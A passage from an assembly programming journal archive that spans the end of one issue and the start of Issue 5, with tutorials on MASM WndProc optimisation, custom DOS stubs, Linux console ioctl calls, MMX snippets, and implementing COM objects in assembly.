; a numeric overflow has occurred, ie: the number being scanned
; has become too big to fit into EAX
;
; CF=0
; if ZF=0 then a valid value was scanned, if ZF=1 then no
; valid digits were scanned
;
; EAX=converted value
;
scanu PROC NEAR
;
;preserve registers
;
PUSH EDX
PUSH EBX
PUSH ECX
PUSH DI
;
;initialise
; EBX=radix constant
; EAX=total
; ECX=0, bits8-24 of ECX always=0 to pad byte digit to dword
; DI=holds original offset
;
XOR EAX,EAX
XOR EBX,EBX
XOR ECX,ECX
MOV DI,SI
MOV BL,BYTE PTR CS:[scanuradi]
;
;main loop start
; EAX,ECX change roles so that we can use AL for the digit calculation
; saving code length
;
lop: XCHG EAX,ECX
LODSB
;
;if "0"-"9" map to 0-9 and skip to radix check
;
SUB AL,030h
CMP AL,0Ah
JC SHORT ko
ADD AL,030h
;
;map "A"-"Z"-/"a"-"z"- to 10-35- aborting on the one invalid value (040h)
;that won't get trapped in the next stage
;
AND AL,0DFh
SUB AL,037h
CMP AL,0Ah
JC SHORT ko2
;
;digit value checked that it is valid for the current radix
;this also weeds out previous invalid values (since they would be >35)
;jump out of loop is delayed so that EAX can be restored for exit
;
ko: CMP AL,BL
CMC
ko2: XCHG EAX,ECX
JC SHORT erriv
;
;accumalate the digit to the total. the total must be pre-multiplied.
;checks for overflow are done at both points so the routine can never
;generate false results
;
MUL EBX
JC errovr
ADD EAX,ECX
JNC lop
;
;overflow error
; adjust SI index to current char and exit, note
; that CF =1 already
;
errovr: DEC SI
JMP SHORT don
;
;invalid character
; main exit point, SI is adjusted to the current char
; the CMP ensures that CF =0, and also that ZF =1 iff
; no chars have been read
;
erriv: DEC SI
CMP SI,DI
;
;(restore registers and exit)
;
don: POP DI
POP ECX
POP EBX
POP EDX
RET
scanu ENDP
=========END OF CODE=======================================================
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
WndProc, The Dirty Way
by X-Calibre of Diamond
I assume you all know what a WndProc is, and what you need it for. Let me
give you a quick example of a WndProc:
WndProc PROC hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
.IF uMsg == WM_DESTROY
INVOKE PostQuitMessage, NULL
.ELSE
INVOKE DefWindowProc, hWnd, uMsg, wParam, lParam
ret
.ENDIF
xor eax, eax
ret
WndProc ENDP
This generates the following code:
push ebp ; Create stack frame
mov ebp, esp ; Why does MASM use 'leave',
; but not 'enter'?
cmp dword ptr [ebp+0C], WM_DESTROY ; ebp+0C is uMsg
jne @@notDestroy
push NULL
Call PostQuitMessage
jmp @@exitFromDestroy
@@notDestroy:
push [ebp+14] ; ebp+14 is lParam
push [ebp+10] ; epb+10 is wParam
push [ebp+0C] ; ebp+0C is uMsg
push [ebp+08] ; ebp+08 is hWnd
Call DefWindowProcA ; Let Windows handle the other
; messages
leave ; Remove stack frame
ret 0010 ; Remove function arguments
; from stack and return
@@exitFromDestroy:
xor eax, eax ; Return 'FALSE'
leave ; Remove stack frame
ret 0010 ; Remove function arguments
; from stack and return
Looks nice, and works fine... But, it builds a stack frame, even though we are
not using local variables. And if you code in a good fashion, there almost
never will be ...after all, this procedure is just a messagehandler, and to keep
your code tidy, you will not put all the code in here, but in separate
procedures,
which you will call from here.
There's only one reason why MASM builds a stack frame for a function: The
function has a prototype for a hll call. A hll call uses the stack to transfer
its arguments.
So, all we have to do, is remove the prototype. That's easy: Just don't tell
MASM that this function uses any arguments.
This simple tweak will do the trick:
WndProc PROC
...
WndProc ENDP
The arguments will still be passed to the function, since that part of the
code is in the Windows kernel, and has not changed. Be careful though: Since
MASM does not know that there are arguments on the stack, it no longer cleans
up the stack. You have to specify that yourself.
Now we have a slight problem: How can we access the arguments now?
The answer is surprisingly easy: We create aliases for the addresses relative
to the stack pointer (esp). MASM does the same, except that it uses the base
pointer since it created a stack frame, and saved the original stack pointer
in ebp.
Knowing that Windows hll calls always push the arguments in reverse order, and
that the return address is stored on the stack aswell, we can devise these
indices for our parameters:
hWnd EQU dword ptr [esp][4]
uMsg EQU dword ptr [esp][8]
wParam EQU dword ptr [esp][12]
lParam EQU dword ptr [esp][16]
There, now we can refer to the arguments as usual.
There's 1 drawback however: Since the indices are relative to esp, they are
only valid when esp is not touched. In other words: Don't try to push or pop
anything and then use these arguments again. They can be used if you push some
variables, then pop them again before you access any of these arguments again,
because the stack pointer will be at the correct position again.
Let's say you need to use the stack again (eg. for an INVOKE), so the indices
will be invalidated. You might think that the only option then is to save the
stack pointer again, so we're back to the stack frame...
It's an option, but not the best one. Namely, ebp is a non-volatile register,
and needs to be saved and restored after use.
But, there are more registers in the CPU, and most of them are volatile. How
about using esi for example?
WndProc PROC
mov esi, esp
hWnd EQU dword ptr [esi][4]
uMsg EQU dword ptr [esi][8]
wParam EQU dword ptr [esi][12]
lParam EQU dword ptr [esi][16]
...
WndProc ENDP
And if you leave the stack as you found it (which should always be the case
with decent code), you don't even need to restore esp again.
If you got dirty and the stack still contains variables you don't want
anymore, then this is enough for a clean exit:
WndProc PROC
...
mov esp, esi
ret 4 * sizeof dword ; As I mentioned earlier, we have to clean
; the stack ourselves.
; We had 4 dword arguments, so this does
; the trick
WndProc ENDP
Still less code, and thus faster than the original. And just as rigid. You
have one register less to use during the WndProc, but as I said earlier, there
shouldn't be too much code here, so should be able to spare the register.
Well, there's just 1 more thing that can be done with this tweaked WndProc.
Namely, if you leave the stack as you found it, the arguments for the
DefWindowProc are already in place, and the return address of our caller is
there too.
So basically we can just jump to it without any further ado. The resulting
WndProc that is equivalent to the original one will look like this then:
WndProc PROC
hWnd EQU dword ptr [esp][4]
uMsg EQU dword ptr [esp][8]
wParam EQU dword ptr [esp][12]
lParam EQU dword ptr [esp][16]
.IF uMsg == WM_DESTROY
INVOKE PostQuitMessage, NULL
.ELSE
jmp DefWindowProc
.ENDIF
xor eax, eax
ret 4 * sizeof dword ; Be sure to clean that stack!
WndProc ENDP
Yes, much shorter, and faster. Let's take a look at the generated code to get
a better understanding of how much shorter it actually is:
cmp dword ptr [esp+08], WM_DESTROY
jne @@noDestroy
push NULL
Call PostQuitMessage
jmp @@exitFromDestroy
@@noDestroy:
Jmp DefWindowProcA
@@exitFromDestroy
xor eax, eax
ret 0010
If you code it 'by hand' instead of with the .IF statement, there's another
tweak we can pull, but the rest looks great, doesn't it?
Of course these stunts can be applied to other procedures as well. Be careful,
and use them in good health.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
Programming the DOS Stub
by X-Calibre of Diamond
As you may (or may not) know, there is a piece of DOS code still in every
Win32 executable file. This piece of code is referred to as the 'stub' and
ensures that the Win32 program won't cause a crash when run on a DOS system.
It just prints the familiar 'This program can not be run in DOS' message and
exits.
'So what do we care?' you might ask... Well, Microsoft's linker provides the
option to link your own stub instead of the standard one. And, you must have
guessed it already by now: We can do it better than Microsoft!
So, how do we do this then?
Well, actually it's very simple: The first part of the Win32 executable is
literally a DOS file. There's just one small requirement: at offset 3Ch (60)
there is a DWORD specifying the start of the PE block relative to the start of
the file (the offset).
So basically you can just put any DOS EXE program in there, as long as you
make sure that there is room for the DWORD at offset 3Ch in the file. Usually
this is no problem, since the EXE header itself is usually quite big, and a
lot of the space is not being used. Microsoft's own stub has an empty header
mostly, and the code starts right after the DWORD, at offset 40h.
That's all fine and nice and whatever, but what can we do with this info?
Well, you could link in an entire DOS program for people not using Windows
(Look at REGEDIT.EXE in Windows 9x for an example). You could include a Fire
or Plasma effect when your program is run in DOS. You could create your own
'This program can not be run in DOS mode' message. But, most importantly:
you can create smaller EXE files! One of the nicer applications of this stub,
which I'm going to explain a bit here.
What is the smallest size for the stub, theoretically speaking?
Well, considering the fact that at offset 60 there MUST be an offset pointing
to the PE header, the minimum size will be 60 bytes.
The actual stub file has to be 64 bytes, because of restrictions of Microsoft's
linker. But be sure not to use the last 4 bytes, since the linker will put in
the offset there.
Well, so in 60 bytes, you can't really do much. But just printing a small
warning for DOS users and then exiting is just about possible. Microsoft made
their version a little large: 120 bytes. So we can try to do just about the
same in 60 bytes.
We're going to use a little trick here, to get the program as small as 60
bytes. At offset 20h, there is room for a relocation table for the code. But
since we won't be needing them, we're going to put our code in there. This
is perfectly possible, because you can specify how many relocation table items
your program will be using. We just put in a 0 word at offset 6 in the header,
and the table is ours. Technically speaking, the code is still after the table.
The table just has a length of 0 bytes.
For all you non-DOS coders out there, this is what the program looks like:
;====================================================================stub.asm
.Model Tiny
.code
start:
push cs ; Point the data segment to the code segment, since
pop ds ; we're putting the data after the code to save space.
mov dx, offset message ; Load pointer to the string for the call.
mov ah, 9 ; 9 is the print argument for int 21h.
int 21h ; The DOS interrupt.
mov ah, 4Ch ; 4C is the exit argument for int 21h
int 21h
; Put our string here
message db "Windows prg!",0Dh,0Ah,'$'
; A little explanation may be required:
;
; 0Dh is the 'Carriage return' ASCII code.
; 0Ah is the 'Line feed' ASCII code.
; '$' is the string-terminator in DOS (like 0 is in Windows and other C based
; OSes)
end start
;=========================================================================EOF
The message can be 15 bytes at most, including the string terminator, since
the program itself starts at offset 32 in the file, and is 12 bytes long.
(32+12+15 = offset 59 bytes, so the next byte will be used for the PE offset
DWORD).
This version yields an undefined error code on exit. The error code is
specified in al when you call the exit DOS function. The errorcode actually
depends on the output in al of the int 21h call that prints the string. This
is ofcourse undefined (actually it is 24h in Windows 98).
Microsoft's stub has a defined errorcode of 1. If you want to make your stub
100% the same, then you must replace the 'mov ah, 4Ch' with 'mov ax, 4C01h'.
Mind you, that this code is 1 byte longer, so your message can then be only 14
bytes long in total.
Since I'm never going to use the errorcode, I decided to save the byte and use
a larger string.
And that's that. Now you may run into trouble with the linker. I couldn't find
a linker that kept the EXE header to its minimum (which is 32 bytes). I used
TLINK, which made a 512 byte header. So I just edited the file manually, and
got it to its minimum size. A document explaining the EXE header format is
enclosed, and so is the STUB.EXE I made, and a small Win32 application using
it (with relocated PE header at 40h).
I will just briefly describe how the filesize is stored in the header, since
the document is not particularly clear there.
offset length description comments
----------------------------------------------------------------------
2 word length of last used sector in file modulo 512
4 word size of file, incl. header in 512-pages
The '512-pages' at offset 4 are (floppy) disk sectors. They are 512 bytes
each. So to calculate how many sectors your file will occupy, this formula
will suffice:
sectors = CEILING(filesize/512)
CEILING means to round off to nearest natural number above the fraction.
The length of the last used sector at offset 2 stores how many bytes are
occupied in the last sector of the file. Like the comment says, it's filesize
modulo 512.
In other words:
lastusedsector = filesize - FLOOR(filesize/512)
The other way around is ofcourse like this:
filesize = (sectors - 1)*512 + lastusedsector
A little note here: Look at these 2 values in a program with the standard
Microsoft stub (eg. NOTEPAD.EXE).
We find these 2 values:
offset 2: 0090h
offset 4: 0003h
So the filesize is: (3 - 1)*512 + 144 = 1168
Now wait just a second! At offset 3Ch we find 00000080h...
So at offset 128 we find the PE header and the Windows program. Then how can
the DOS stub be 1168 bytes?
It can't!! Microsoft goofed up here... They have probably hand-edited the
EXE file they used for the stub like I did, and forgot to edit these values.
Luckily for them, this bug does no harm. But still...
Well, after we have created our DOS stub, all we have to do is link it in.
With Microsoft's linker it goes like this:
LINK code.obj /SUBSYSTEM:WINDOWS /STUB:STUB.EXE
And that's all you need!
You can ignore the warning the linker gives about the incomplete header. We
know that the program runs. The linker just doesn't consider EXE headers with
no relocation table (which could actually be considered a bug, since our EXE
header specifies that the table has length 0, and therefore the code can start
at offset 20h. The DOS EXE loader does interpret it correctly, so in fact, the
linker could be considered incompatible).
The only problem with Microsoft's linker is that it doesn't seem to want to
link the PE block right after the DOS stub. Maybe other linkers do, but I
haven't found one that does yet. Microsoft's linker just dumps some garbage,
and then puts its PE block at offset 78h. Maybe that is because their stub is
78h bytes long and they don't consider shorter stubs?
The offset at which the PE block is linked depends on the initial SP value
specified at offset 10h, actually (why is that?). It can also link at offset
80h or 88h.
You could move the PE block to offset 40h, and pad with 0's after the PE block,
using a hex-editor. This way it will compress even better, maybe. And you
could perhaps edit the PE block and move the code forward a bit too (there's a
great util in this. Shall we make it?).
Well, anyway... Have fun, and get crazy with your custom DOS stubs!
And remember:
DOS Knowledge is power!
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
Using ioctl()
by mammon_
One of the most famous Unix maxims reads 'everything is a file'; directories
are files, pipes are files, hardware devices are files, even files are files.
This provided a transparent means or reading and writing hardware or software
constructs such as modems and sockets; yet the lack of interrupts or device
driver routines is sometimes confusing for those not used to Unix programming.
In linux, handling device parameters through the character and block 'special
file' interface is handled through ioctl().
The ioctl() system call takes a file descriptor and a request type as its
primary arguments, along with an optional third argument referred to as "argp"
which contains any arguments that must be passed along with the request. The
possible ioctl() requests can be found by poking around in the $INCLUDE/asm and
$INCLUDE/linux header files, although a somewhat dated list of requests can be
viewed by typing 'man ioctl_list'.
One of the most useful devices to program with ioctl() for the applications
programmer will be the console; in linux terms, this consists of the keyboard
and display, such that all 63 of the Virtual Consoles can be controlled with
ioctl(). This can be useful if one wants to output debugging information to a
non-visible console, or to transfer STDIN and STDOUT to a newly-allocated
console while disabling virtual console switching, effectively tying the user
to a single console [e.g., in a walkup workstation].
Information on console ioctl requests can be found with 'man console_ioctl'.
Bringing up this man page instantly displays the following text:
WARNING: If you use the following information you are
going to burn yourself.
WARNING: ioctl's are undocumented Linux internals, liable
to be changed without warning. Use POSIX functions.
This is ancient asm coderspeak meaning 'you are on the right track, keep going.'
Perusing the listed requests will provide enough information to code that first
exercise from DOS-ASM 1o1: generating a tone on the PC speaker.
KDMKTONE
Generate tone of specified length. The lower 16
bits of argp specify the period in clock cycles,
and the upper 16 bits give the duration in msec.
If the duration is zero, the sound is turned off.
Control returns immediately. For example, argp =
(125<<16) + 0x637 would specify the beep normally
associated with a ctrl-G. (Thus since 0.99pl1;
broken in 2.1.49-50.)
This should not be too terribly hard to implement -- a call to open the file
descriptor, and a single call to ioctl() to sound the tone. First things first,
open() is called on /dev/tty to create a handle for the current console:
#-------------------------------------------------------------------beep.asm
%define O_RDWR 2 ;grep O_RDWR /usr/include/asm/*
%define KDMKTONE 0x4B30 ;grep KDMKTONE /usr/include/linux/*
EXTERN open
GLOBAL main
section .data
szTTY db '/dev/tty',0
section .text
main:
push dword O_RDWR
push dword szTTY
call open
add esp, 8
#--------------------------------------------------------------------BREAK
Next, calculate the frequency and duration of the tone to be played:
#---------------------------------------------------------------------CONT
mov dx, 666 ;duration
shl edx, 16
or dx, 1199 ;tone
#--------------------------------------------------------------------BREAK
Now, normally one might call ioctl as so:
push edx
push dword KDMKTONE
push eax
call ioctl
add esp, 12
However, ioctl is a systemcall, and we can save a bit of time by going
straight through the syscall gate at 0x80:
#---------------------------------------------------------------------CONT
mov ebx, eax
mov ecx, KDMKTONE
mov eax, 54 ;ioctl func defined in /usr/include/asm/unistd.h
int 0x80
ret
#----------------------------------------------------------------------EOF
So much for the simple beep. Another ASM 101 favorite is the 'blinking LED'
trick, where students learn to make the keyboard LEDs blink on and off in any
number of psychedelic patterns. A quick tour through the man page shows the
requests needed for this sample as well:
KDGETLED
Get state of LEDs. argp points to a long int. The
lower three bits of *argp are set to the state of
the LEDs, as follows:
LED_CAP 0x04 caps lock led
LED_NUM 0x02 num lock led
LED_SCR 0x01 scroll lock led
KDSETLED
Set the LEDs. The LEDs are set to correspond to
the lower three bits of argp. However, if a higher
order bit is set, the LEDs revert to normal: dis-
playing the state of the keyboard functions of caps
lock, num lock, and scroll lock.
The file descriptor must be opened as with the previous example. From there,
we must get the current LED state:
#--------------------------------------------------------------------led.asm
%define KDGETLED 0x4B31 ;grep KDGETLED /usr/include/linux/*
%define KDSETLED 0x4B32 ;grep KDSETLED /usr/include/linux/*
xor edx, edx
mov ecx, KDGETLED
mov ebx, eax
mov eax, 54
int 0x80
#--------------------------------------------------------------------BREAK
Next, all of the LEDs will be turned on and then off 10 times. It is vital
to the success of the algorithm that a delay be present between the off and
on transitions; otherwise the LEDs will appear to be steadily lit, and that
is much less of a programming achievement:
#---------------------------------------------------------------------CONT
mov ecx, 10
.here:
push ecx ;save counter
or edx, 0x07 ;set all of 'em
mov ecx, KDSETLED
mov eax, 54
int 0x80
mov ecx, 0xFFFFFF ;delay counter
.delay:
loop .delay
and edx, 0 ;turn all of them off
mov ecx, KDSETLED
mov eax, 54
int 0x80
mov ecx, 0xFFFFFF ;next delay counter
.delay2:
loop .delay2
pop ecx
loop .here
ret
#----------------------------------------------------------------------EOF
Blinking the LEDs in succession and achieving hypnotic frequency via ioctl()
will be left as an exercise to the reader.
This should provide a quick introduction to using ioctl(). There are many more
possibilities available for scan codes, screen painting, and virtual console
control; further opportunities for console amusement exist also within the realm
of escape-sequence programming. The examples presented here can be compiled with
the standard
nasm -f elf file.asm
gcc -o file file.o
combination, or by using a Makefile:
#----------------------------------------------------------------------Makefile
TARGET =beep #TARGET is the variable storing the base filename
ASM = nasm #ASM contains the name of the assembler
ASMFILE = $(TARGET).asm #ASMFILE contains the full name of the source file
OBJFILE = $(TARGET).o #OBJFILE contains the full name of the object file
LINKER = gcc #LINKER contains the full name of the linker
LIBS = #LIBS contains any library flags
LIBDIR = #LIBDIR contains any library location flags
all: #the 'all:' section applies to all targets
$(ASM) -o $(OBJFILE) -f elf $(ASMFILE)
$(LINKER) -o $(TARGET) $(OBJFILE) $(LIBDIR) $(LIBS)
#---------------------------------------------------------------------------EOF
As with all Makefiles, with the target correctly set the source will be compiled
and linked simply by typing 'make' in the directory where the Makefile is
located.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................ASSEMBLY.LANGUAGE.SNIPPETS
BinToString
by Cecchinel Stephan
;Summary: Converts a 32 bit number to an 8-byte string.
;Compatibility: MMX+
;Notes: 14 cycles. Input is stored in EAX; the output is a hex-
; format character string pointed to by [EDI].
Sum1: dd 0x30303030, 0x30303030
Mask1: dd 0x0f0f0f0f, 0x0f0f0f0f
Comp1: dd 0x09090909, 0x09090909
Hex32:
bswap eax
movq mm3,[Sum1]
movq mm4,[Comp1]
movq mm2,[Mask1]
movq mm5,mm3
psubb mm5,mm4
movd mm0,eax
movq mm1,mm0
psrlq mm0,4
pand mm0,mm2
pand mm1,mm2
punpcklbw mm0,mm1
movq mm1,mm0
pcmpgtb mm0,mm4
pand mm0,mm5
paddb mm1,mm3
paddb mm1,mm0
movq [edi],mm1
ret
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................ISSUE.CHALLENGE
Absolute Value
by Laura Fairhead
The Challenge
-------------
Find the absolute value of a register in only 4 bytes.
The Solution
------------
NEG AX
JL SHORT $-4
This was not completely my original idea (is there such thing??); I
found a similar sequence which used the more obvious branch 'JS'. The
JS had the problem that it goes into an infinite loop if AX=08000h.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::.......................................................FIN
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::. July-Sep 99
:::\_____\::::::::::. Issue 5
::::::::::::::::::::::.........................................................
A S S E M B L Y P R O G R A M M I N G J O U R N A L
http://asmjournal.freeservers.comasmjournal@...
T A B L E O F C O N T E N T S
----------------------------------------------------------------------
Introduction...................................................mammon_
"COM in Assembly Part II"...................................Bill.Tyler
"How to use DirectDraw in ASM"...............................X-Calibre
"Writing Boot Sectors To Disk"...........................Jan.Verhoeven
"Dumping Memory to Disk".................................Jan.Verhoeven
"Formatted Numeric Output"..............................Laura.Fairhead
"Linked Lists in ASM"..........................................mammon_
Column: Win32 Assembly Programming
"Structured Exception Handling under Win32"...........Chris.Dragan
"Child Window Controls"...................................Iczelion
"Dialog Box as Main Window"...............................Iczelion
"Standardizing Win32 Callback Procedures"............Jeremy.Gordon
Column: The Unix World
"Fire Demo ported to Linux SVGAlib".................Jan.Wagemakers
Column: Assembly Language Snippets
"Abs".................................................Chris.Dragan
"Min".................................................Chris.Dragan
"Max".................................................Chris.Dragan
"OBJECT"...................................................mammon_
Column: Issue Solution
"Binary to ASCII"....................................Jan.Verhoeven
----------------------------------------------------------------------
++++++++++++++++++Issue Challenge+++++++++++++++++
Convert a bit value to ACIII less than 10 bytes
----------------------------------------------------------------------
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::..............................................INTRODUCTION
by mammon_
I suppose I should start with the good news. A week or so ago Hiroshimator
emailed me for the nth time asking if I needed help with the journal as I have
yet to get one out on time. I relented and asked if he knew any listservers;
one hour later he had an account for APJ set up at e-groups, specifically:
http://www.egroups.com/group/apj-announce
One of the greatest obstacles to putting out these issues -- processing the
300 or so subscription requests that rack up between issues -- is now out of
the way for good.
The articles this month have somewhat of a high-level focus; with the COM and
Direct Draw by Bill Tyler and X-Caliber, respectively, as well as Chris
Dragan's classic work on exception handling and Jeremy Gordon's treatment of
windows callbacks, this issue is heavily weighed towards high-level win32
coding. Add to this Iczelion's two tutorials and my own win32-biased
linked list example, and it appears the DOS/Unix camp is losing ground.
To shore up the Unix front line, Jan Wagemakers has provided a port of last
month's fire demo to linux [GAS]. In addition, there are A86 articles by Jan
Verhoeven and a general assembly routine by Laura Fairhead to prove that not
all assembly has to be 32-bit.
And, finally, I am looking for a good 'challenge' columnist: someone to write
the monthly APJ challenges [and their solutions] so that I can start
announcing next month's challenge sooner than next month...
Now at last I can sleep ;)
_m
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
COM in Assembly Part II
by Bill Tyler
My previous atricle described how to use COM objects in your assembly
language programs. It described only how to call COM methods, but not how to
create your own COM objects. This article will describe how to do that.
This article will describe implementing COM Objects, using MASM syntax. TASM
or NASM assemblers will not be considered, however the methods can be easily
applied to any assembler.
This article will also not describe some of the more advanced features of COM
such as reuse, threading, servers/clients, and so on. These will presented
in future articles.
COM Interfaces Review
------------------------------------------------------------------------------
An interface definition specifies the interface's methods, their return types,
the number and types of their parameters, and what the methods must do. Here
is a sample interface definition:
IInterface struct
lpVtbl dd ?
IInterface ends
IInterfaceVtbl struct
; IUnknown methods
STDMETHOD QueryInterface, :DWORD, :DWORD, :DWORD
STDMETHOD AddRef, :DWORD
STDMETHOD Release, :DWORD
; IInterface methods
STDMETHOD Method1, :DWORD
STDMETHOD Method2, :DWORD
IInterfaceVtbl ends
STDMETHOD is used to simplify the interface declaration, and is defined as:
STDMETHOD MACRO name, argl :VARARG
LOCAL @tmp_a
LOCAL @tmp_b
@tmp_a TYPEDEF PROTO argl
@tmp_b TYPEDEF PTR @tmp_a
name @tmp_b ?
ENDM
This macro is used to greatly simplify interface declarations, and so that the
MASM invoke syntax can be used. (Macro originally by Ewald :)
Access to the interface's methods occurs through a pointer. This pointer
points to a table of function pointers, called a vtable. Here is a sample
method call:
mov eax, [lpif] ; lpif is the interface pointer
mov eax, [eax] ; get the address of the vtable
invoke (IInterfaceVtbl [eax]).Method1, [lpif] ; indirect call to the function
- or -
invoke [eax][IInterfaceVtbl.Method2], [lpif] ; alternate notation
Two different styles of addressing the members are shown. Both notations
produce equivalent code, so the method used is a matter of personal
preference.
All interfaces must inherit from the IUnknown interface. This means that the
first 3 methods of the vtable must be QueryInterface, AddRef, and Release.
The purpose and implementation of these methods will be discussed later.
GUIDS
------------------------------------------------------------------------------
A GUID is a Globally Unique ID. A GUID is a 16-byte number, that is unique
to an interface. COM uses GUID's to identify different interfaces from one
another. Using this method prevents name clashing as well as version
clashing. To get a GUID, you use a generator utility that is included with
most win32 development packages.
A GUID is represented by the following structure:
GUID STRUCT
Data1 dd ?
Data2 dw ?
Data3 dw ?
Data4 db 8 dup(?)
GUID ENDS
A GUID is then defined in the data section:
MyGUID GUID <3F2504E0h, 4f89h, 11D3h, <9Ah, 0C3h, 0h, 0h, 0E8h, 2Ch, 3h, 1h>>
Once a GUID is assigned to an interface and published, no furthur changes to
the interface definition are allowed. Note, that this does mean that the
interface implementation may not change, only the definition. For changes
to the interface definition, a new GUID must be assigned.
COM Objects
------------------------------------------------------------------------------
A COM object is simply an implementation of an interface. Implementation
details are not covered by the COM standard, so we are free to implement our
objects as we choose, so long as they satisfy all the requirements of the
interface definition.
A typical object will contain pointers to the various interfaces it supports,
a reference count, and any other data that the object needs. Here is a sample
object definition, implemented as a structure:
Object struct
interface IInterface <?> ; pointer to an IInterface
nRefCount dd ? ; reference count
nValue dd ? ; private object data
Object ends
We also have to define the vtable's we are going to be using. These tables
must be static, and cannot change during run-time. Each member of the vtable
is a pointer to a method. Following is a method for defining the vtable.
@@IInterface segment dword
vtblIInterface:
dd offset IInterface@QueryInterface
dd offset IInterface@AddRef
dd offset IInterface@Release
dd offset IInterface@GetValue
dd offset IInterface@SetValue
@@IInterface ends
Reference Counting
------------------------------------------------------------------------------
COM object manage their lifetimes through reference counting. Each object
maintains a reference count that keeps track of how many instances of the
interface pointer have been created. The object is required to keep a
counter that supports 2^32 instances, meaning the reference count must be a
DWORD.
When the reference count drops to zero, the object is no longer in use, and
it destroys itself. The 2 IUnknown methods AddRef and Release handle the
reference counting for a COM object.
QueryInterface
------------------------------------------------------------------------------
The QueryInterface method is used by a COM object to determine if the object
supports a given interface, and then if supported, to get the interface
pointer. There are 3 rules to implementing the QueryInterface method:
1. Objects must have an identity - a call to QueryInterface must always
return the same pointer value.
2. The set of interfaces of an object must never change - for example, if
a call to QueryInterface with on IID succeeds once, it must succeed
always. Likewise, if it fails once, it must fail always.
3. It must be possible to successfully query an interface of an object
from any other interface.
QueryInterface returns a pointer to a specified interface on an object to
which a client currently holds an interface pointer. This function must call
the AddRef method on the pointer it returns.
Following are the QueryInterface parameters:
pif : [in] a pointer to the calling interface
riid : [in] pointer to the IID of the interface being queried
ppv : [out] pointer to the pointer of the interface that is to be set.
If the interface is not supported, the pointed to value is set to 0
QueryInterface returns the following:
S_OK if the interface is supported
E_NOINTERFACE if not supported
Here is a simple assembly implementation of QueryInterface:
IInterface@QueryInterface proc uses ebx pif:DWORD, riid:DWORD, ppv:DWORD
; The following compares the requested IID with the available ones.
; In this case, because IInterface inherits from IUnknown, the IInterface
; interface is prefixed with the IUnknown methods, and these 2 interfaces
; share the same interface pointer.
invoke IsEqualGUID, [riid], addr IID_IInterface
or eax,eax
jnz @1
invoke IsEqualGUID, [riid], addr IID_IUnknown
or eax,eax
jnz @1
jmp @NoInterface
@1:
; GETOBJECTPOINTER is a macro that will put the object pointer into eax,
; when given the name of the object, the name of the interface, and the
; interface pointer.
GETOBJECTPOINTER Object, interface, pif
; now get the pointer to the requested interface
lea eax, (Object ptr [eax]).interface
; set *ppv with this interface pointer
mov ebx, [ppv]
mov dword ptr [ebx], eax
; increment the reference count by calling AddRef
GETOBJECTPOINTER Object, interface, pif
mov eax, (Object ptr [eax]).interface
invoke (IInterfaceVtbl ptr [eax]).AddRef, pif
; return S_OK
mov eax, S_OK
jmp return
@NoInterface:
; interface not supported, so set *ppv to zero
mov eax, [ppv]
mov dword ptr [eax], 0
; return E_NOINTERFACE
mov eax, E_NOINTERFACE
return:
ret
IInterface@QueryInterface endp
AddRef
------------------------------------------------------------------------------
The AddRef method is used to increment the reference count for an interface
of an object. It should be called for every new copy of an interface pointer
to an object.
AddRef takes no parameters, other than the interface pointer required for all
methods. AddRef should return the new reference count. However, this value
is to be used by callers only for testing purposes, as it may be unstable in
certain situations.
Following is a simple implementation of the AddRef method:
IInterface@AddRef proc pif:DWORD
GETOBJECTPOINTER Object, interface, pif
; increment the reference count
inc [(Object ptr [eax]).nRefCount]
; now return the count
mov eax, [(Object ptr [eax]).nRefCount]
ret
IInterface@AddRef endp
Release
------------------------------------------------------------------------------
Release decrements the reference count for the calling interface on a object.
If the reference count on the object is decrememnted to 0, then the object is
freed from memory. This function should be called when you no longer need to
use an interface pointer
Like AddRef, Release takes only one parameter - the interface pointer. It
also returns the current value of the reference count, which, similarly, is to
be used for testing purposess only
Here is a simple implementation of Release:
IInterface@Release proc pif:DWORD
GETOBJECTPOINTER Object, interface, pif
; decrement the reference count
dec [(Object ptr [eax]).nRefCount]
; check to see if the reference count is zero. If it is, then destroy
; the object.
mov eax, [(Object ptr [eax]).nRefCount]
or eax, eax
jnz @1
; free the object: here we have assumed the object was allocated with
; LocalAlloc and with LMEM_FIXED option
GETOBJECTPOINTER Object, interface, pif
invoke LocalFree, eax
@1:
ret
IInterface@Release endp
Creating a COM object
------------------------------------------------------------------------------
Creating an object consists basically of allocating the memory for the
object, and then initializing its data members. Typically, the vtable
pointer is initialized and the reference count is zeroed. QueryInterface
could then be called to get the interface pointer.
Other methods exist for creating objects, such as using CoCreateInstance, and
using class factories. These methods will not be discussed, and may be a
topic for a future article.
COM implementatiion sample application
------------------------------------------------------------------------------
Here follows a sample implementation and usage of a COM object. It shows how
to create the object, call its methods, then free it. It would probably be
very educational to assemble this and run it through a debugger. This and
other examples can be found at http://asm.tsx.org.
.386
.model flat,stdcall
include windows.inc
include kernel32.inc
include user32.inc
includelib kernel32.lib
includelib user32.lib
includelib uuid.lib
;-----------------------------------------------------------------------------
; Macro to simply interface declarations
; Borrowed from Ewald, http://here.is/diamond/
STDMETHOD MACRO name, argl :VARARG
LOCAL @tmp_a
LOCAL @tmp_b
@tmp_a TYPEDEF PROTO argl
@tmp_b TYPEDEF PTR @tmp_a
name @tmp_b ?
ENDM
; Macro that takes an interface pointer and returns the implementation
